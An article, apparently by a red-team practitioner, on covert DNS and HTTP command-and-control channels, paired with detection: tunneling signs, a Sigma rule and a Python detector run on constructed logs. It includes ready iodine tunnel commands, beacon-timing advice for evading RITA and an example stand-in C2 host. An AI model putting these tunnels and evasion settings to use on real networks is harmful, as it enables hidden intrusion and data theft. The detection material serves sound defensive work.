On a red team operation in the financial sector, we stood up dnscat2 on a rented VPS, set up the NS delegation and drove commands through TXT records for two days, while at the same time dumping hashes from NTDS.dit. Suricata on the perimeter was silent. The SIEM raised not a single alert. SOC analysts were digging through the HTTP logs of the proxy, while the DNS traffic quietly went out through the standard corporate resolver, with no control over request length and no check of subdomain entropy. Covert C2 channels work precisely because DNS and HTTP are the two protocols the infrastructure trusts by default: the firewall lets them through, the proxy does not inspect them, and nobody has built a baseline.
dnscat2 is a tool designed to create an encrypted command and control (C&C) channel over the DNS protocol, which makes it an effective tunnel out of almost any network.
NS (Name Server) records designate the name servers that form part of the DNS system.
Suricata is high-performance open-source software for network analysis and threat detection used in cybersecurity.
Business Logic of Covert C2 Channels and Their Place in the Kill Chain
A covert C2 channel is not an end in itself. It is an infrastructure element without which not a single step after the initial penetration works. In MITRE ATT&CK, covert channels cover several tactics at once: Command and Control - DNS (T1071.004), Protocol Tunneling (T1572), Protocol Impersonation (T1001.003), Steganography (T1001.002), Domain Fronting (T1090.004), Domain Generation Algorithms (T1568.002) - and Exfiltration - Exfiltration Over C2 Channel (T1041), Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003).
Position in the kill chain: initial access (phishing, compromised service) -> foothold (a dropper installs an agent, the agent initiates an outbound connection) -> C2 channel (DNS tunneling or HTTP covert channel) -> post-exploitation (lateral movement, privilege escalation, credential dumping through the channel) -> exfiltration (pulling data out through the same channel). While the channel is alive, the attacker is inside the network.
In SUNBURST (SolarWinds, 2020), DNS queries to subdomains of avsvmcloud.com worked as a stage-1 selector: an encoded victim identifier was carried in the subdomain, and the DNS replies (CNAME records) classified the victims. For selected targets the second stage was launched - delivery of TEARDROP and Cobalt Strike Beacon with HTTP/HTTPS C2 (according to FireEye / Mandiant, December 2020). In the Decoy Dog campaign (2023, according to Infoblox) - a cluster of activity with Pupy RAT over DNS C2 via TXT records. Two years apart, the same idea: nobody watches DNS traffic.
Pupy is a cross-platform RAT and open-source post-exploitation framework written primarily in Python.
DNS tunneling - mechanics and tools
How DNS covert channel works
DNS tunneling (T1071.004, Command and Control) exploits the ordinary mechanism of recursive name resolution. The attacker registers a domain and stands up an authoritative DNS server for it. The agent on the compromised host encodes data into a subdomain: base64encodeddata.c2.attacker.tld. The corporate resolver forwards the request along the recursion chain to the attacker's server. The C2 server decodes the subdomain, extracts the data and returns the command in TXT, CNAME or A records.
Why it works: DNS traffic is passed by firewalls in both directions - name resolution is needed for the network to function at all. According to ICANN, DNS traffic often gets out even before user authorization, which allows captive portals to be bypassed. Channel speed is the pain point: the maximum length of a DNS label is 63 bytes, of a full name 253 bytes. That means kilobits per second. Fine for C2 commands; for exfiltrating terabytes - forget it.
DNS tunneling tools and their artifacts
iodine - tunnels IPv4 over DNS, creates a virtual interface dns0. Supports record types A, TXT, MX, CNAME, NULL. According to Netskope, in the idle state the client polls the server at a fixed frequency - and this is the main detection artifact. In a packet dump, unprintable characters stick out in the DNS queries. Server launch: iodined -f -c -P password 10.10.10.1 tunnel.domain.tld; client: iodine -f -P password tunnel.domain.tld. Open-source project on GitHub (the maintenance status should be checked by the date of the last commit before use).
[Applicable to: internal pentest, captive portal bypass. Requires direct access to a DNS resolver that forwards requests outward. Does not work if corporate DNS is forcibly proxied through DNS-over-HTTPS]
dnscat2 - a C2 framework that works exclusively over DNS. Encrypted session with fingerprint verification, shell, file upload and download. According to Netskope, the characteristic artifact is a consistent hex pattern in the hostnames of DNS queries. On connection, the client reports a fingerprint: "Poxes Story Peace Harp Lordy Flacks" - both sides confirm the integrity of the encryption. Project on GitHub (iagox86/dnscat2), server in Ruby, client in C.
[Applicable: red team C2 when HTTP/HTTPS egress is blocked, internal pentest. Can work against a server by direct IP without domain registration. Not suitable for exfiltrating large volumes - the channel is slow]
Cobalt Strike DNS beacon - a commercial C2 framework with a DNS beacon over TXT, A and AAAA records. Supports jitter and sleep to simulate irregular traffic. The DNS beacon is used as a fallback: switching to HTTPS when it is available, rolling back to DNS when it is blocked. Starting with Cobalt Strike 4.9 (Fortra, September 2023), the DNS beacon has been redesigned - pure DNS C2 has its limitations, and hybrid DNS+HTTP is recommended for full-featured work.
[Applicable: red team operations with long-term presence, operations with multiple channels. Requires a license. The DNS beacon is slower than HTTP - inconvenient for interactive work]
dns2tcp - tunnels TCP connections through DNS queries. Supports TXT and KEY records. Open-source project (alex-sector/dns2tcp). Suitable for targeted exfiltration and TCP egress in restricted environments.
From real campaigns: the APT group OilRig used DNS tunneling to map the internal network before escalating the attack (according to Palo Alto Networks). B1txor20 - a GNU/Linux backdoor (found in 2022) that got in through Log4Shell and used DNS tunneling as its C2 channel (according to 360 Netlab, February 2022).
When DNS tunneling doesn't work

Malleable C2, domain fronting and steganographic channels
HTTP covert channels (T1001.003, T1572) work at a different level: instead of exploiting a permitted protocol, they mimic specific legitimate services. A covert channel over HTTP is disguised so that in proxy and SIEM logs the requests look like normal web traffic.
In Cobalt Strike, Malleable C2 profiles allow you to completely rewrite the beacon's HTTP requests: URI, headers, User-Agent, Content-Type, body. In practice, I set up profiles that simulated traffic to a CDN - at the proxy log level, the requests looked like calls to a legitimate CDN domain with a valid User-Agent and Content-Type: application/octet-stream. Timing patterns were tuned by hand: sleep 60 seconds, jitter 37% - so as not to trigger the beaconing detection in RITA.
Domain Fronting (T1090.004) - sending a TLS ClientHello with the SNI of a legitimate CDN domain and the HTTP Host header with the C2 domain. The CDN routes the request to the C2 server, while only the legitimate domain is visible in TLS logs and on the proxy. The technique has lost its universality: Google Cloud and AWS CloudFront shut down domain fronting in April 2018, Microsoft announced blocking on Azure in March 2021, and technical enforcement was completed in November 2022 (Azure Front Door enforcement, Azure Network Security blog). Individual CDNs (Fastly, Cloudflare Workers) allowed similar configurations for longer - a red team should check the current policies of the specific provider before each project.
[Applicable: external pentest, red team against perimeter proxy inspection. Does not work under TLS inspection that checks SNI against Host. Requires a CDN provider that does not block domain fronting]
Steganographic HTTP channels (T1001.002) - data are encoded in visually normal objects: EXIF metadata of images, CSS files, HTML comments. According to Varonis, there are cases where malware received a list of C2 servers from GPS coordinates in photos and from comments on social networks. The transmission speed is low, but stealth is maximal - a standard IDS/IPS does not analyze image content for hidden data.
Sliver - an open-source C2 framework with support for HTTP/HTTPS, DNS and mTLS channels. HTTP profiles are less flexible than Malleable C2, but basic mimicry is covered. Written in Go, which produces a specific JA3 fingerprint of the TLS connection, different from a browser's. In practice this means: if the defenders have set up a JA3 whitelist, the Sliver agent burns on the first request.
Restrictions of HTTP covert channels

Detection of DNS tunneling: signs in traffic
A number of academic studies (Buczak & Guven, 2016; Nadler et al., 2019) showed that ML classifiers based on statistical features of subdomains reach accuracy above 95% in detecting DNS tunneling. Analysis of malware samples and tunneling tools confirms it: each leaves unique patterns in metadata - length, entropy, frequency, record types. But not every SOC will deploy an ML model. The basic indicators are caught by standard means.
Five signs of DNS tunneling in logs:
1. Subdomain length - a normal query contains 10-30 characters. iodine and dnscat2 with default settings generate subdomains 50-63 characters long. A threshold of |query| > 50 on Zeek dns.log is the first filter.
2. Query entropy - base32/base64-encoded data give an entropy of 4.5-5.5 bits per symbol (Shannon entropy). Legitimate domains - 2.5-3.5. Computed in Zeek or in the SIEM over the query field.
3. Volume of requests to a single domain - hundreds of TXT queries from one host to one domain per minute. The baseline is built from dns.log over 7-14 days.
4. Atypical record types - mass TXT and NULL requests. iodine picks the most productive record type (NULL/PRIVATE/TXT/SRV/MX/CNAME/A) during the handshake; in environments that filter NULL - usually TXT. dnscat2 - TXT and CNAME.
5. Fixed frequency - iodine in idle mode polls the server at a constant interval (confirmed by Netskope). Frequency without jitter is a beaconing signal.
Mapping to specific products:
• Zeek: dns.log with the fields query, qtype_name, rcode - filtering by length and record type covers default configurations of DNS tunneling tools
• Suricata: ET Open rules for iodine and dnscat2 based on magic bytes. A change of encoding defeats them, but they catch out-of-the-box setups
• Palo Alto PA-series (App-ID): identifies DNS tunneling as an application category and blocks it at the security policy level
• CrowdStrike Falcon: Falcon Insight detects DNS beaconing from endpoint telemetry - it monitors the DNS requests of specific processes
• Elastic 8.x+: built-in ML jobs for DNS anomaly detection - unusual DNS activity, rare DNS queries
HTTP C2: Detection by Behavior
Detection of HTTP covert channels is based on behavioral anomalies:
• Beaconing - RITA (Real Intelligence Threat Analytics) analyzes Zeek conn.log and HTTP logs and computes a beaconing score. Cobalt Strike with jitter < 30% is detected reliably. With jitter of 50%+ it gets more interesting - but RITA still builds the distribution and looks for statistical outliers.
• JA3 mismatch - the process declares a Chrome User-Agent, but the JA3 fingerprint corresponds to the Go/C# TLS stack. Elastic 8.x+ with the TLS fingerprinting module and CrowdStrike Falcon compare JA3 against a whitelist of legitimate applications.
• Body entropy - encrypted C2 data in an HTTP response have high entropy, atypical for HTML/JSON. Zeek with file analysis computes the entropy of the downloaded objects.
Example of a Sigma rule for DNS tunneling detection:
This is a skeleton - in a production SIEM (MaxPatrol SIEM, Elastic, Splunk) an entropy calculation using the platform's own means is added on top, with the threshold shannon_entropy > 4.0.
title: DNS Tunneling - Long Subdomain Query
status: experimental
logsource:
  category: dns
  product: zeek
  service: dns
detection:
  selection:
    query|re: '^[^.]{30,63}\.'
  filter:
    query|endswith:
      - '.in-addr.arpa'
      - '.ip6.arpa'
  condition: selection and not filter
fields:
  - query
  - src_ip
  - qtype
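As an added illustration (not code from the article or from any tool it names), the script below runs the five signs of DNS tunneling listed earlier, plus the entropy check the text says a production SIEM would add on top of this Sigma skeleton, over a few constructed Zeek dns.log-style rows. It assumes a TSV subset of dns.log (ts, id.orig_h, query, qtype_name), approximates the registered domain as the last two labels (a deployment would use the Public Suffix List), and its volume and interval thresholds are assumed values for the sample window.

```python
import math
from collections import defaultdict

LABEL_LEN_MIN, ENTROPY_MIN, RATE_MIN = 30, 4.0, 3   # Sigma regex, article threshold, assumed window rate
ATYPICAL_QTYPES = {"TXT", "NULL", "CNAME"}
REVERSE_SUFFIXES = (".in-addr.arpa", ".ip6.arpa")
_B32 = "abcdefghijklmnopqrstuvwxyz234567"

def _fake_payload(i):
    """Constructed 52-char stand-in for a base32-encoded chunk (rotated alphabet plus prefix)."""
    rot = _B32[i:] + _B32[:i]
    return rot + rot[:20]

# Constructed sample in a Zeek dns.log-like TSV layout: ts, id.orig_h, query, qtype_name
SAMPLE_DNS_LOG = "\n".join("\t".join(r) for r in [
    ("1700000000.0", "10.1.2.3", "www.example.com", "A"),
    ("1700000001.0", "10.1.2.3", "mail.example.com", "MX"),
    ("1700000002.0", "10.1.2.9", "4.3.2.10.in-addr.arpa", "PTR"),
    ("1700000003.0", "10.1.2.3", "cdn-static-assets.example.net", "A"),
] + [(str(1700000010.0 + 5 * i), "10.1.2.7",
      f"{_fake_payload(i)}.c2.attacker-example.tld", "TXT") for i in range(4)])

def shannon_entropy(s):
    """Bits per symbol over the characters of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def interval_cv(timestamps):
    """Coefficient of variation of inter-query gaps; near 0 means a fixed polling interval."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 2 or sum(gaps) == 0:
        return None
    mean = sum(gaps) / len(gaps)
    return math.sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps)) / mean

def score_dns_log(text):
    """Map (src host, registered domain) -> set of the five tunneling signs it trips."""
    pairs = defaultdict(lambda: {"signs": set(), "ts": []})
    for line in text.splitlines():
        if not line or line.startswith("#"):          # skip Zeek header/comment lines
            continue
        ts, src, query, qtype = line.split("\t")[:4]
        if query.endswith(REVERSE_SUFFIXES):          # reverse lookups, as in the Sigma filter
            continue
        labels = query.rstrip(".").lower().split(".")
        sub, domain = labels[:-2], ".".join(labels[-2:])   # last two labels ~ registered domain
        entry = pairs[(src, domain)]
        entry["ts"].append(float(ts))
        if sub and max(len(lbl) for lbl in sub) >= LABEL_LEN_MIN:
            entry["signs"].add("long_label")          # sign 1: label length
        if shannon_entropy("".join(sub)) > ENTROPY_MIN:
            entry["signs"].add("high_entropy")        # sign 2: Shannon entropy
        if qtype in ATYPICAL_QTYPES:
            entry["signs"].add("atypical_qtype")      # sign 4: record type
    for entry in pairs.values():
        if len(entry["ts"]) >= RATE_MIN:
            entry["signs"].add("high_volume")         # sign 3: volume per host/domain
        cv = interval_cv(sorted(entry["ts"]))
        if cv is not None and cv < 0.1:
            entry["signs"].add("fixed_interval")      # sign 5: polling without jitter
    return {pair: e["signs"] for pair, e in pairs.items()}

def suspicious_pairs(text, min_signs=3):
    """Pairs tripping at least min_signs indicators; one lone TXT query never qualifies."""
    return sorted(p for p, s in score_dns_log(text).items() if len(s) >= min_signs)
```

Requiring several signs together is what keeps a single SPF TXT lookup or one long CDN hostname from paging the SOC; the per-pair sign set is what you would feed into a SIEM correlation rule.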
Comparison of covert C2 channel tools
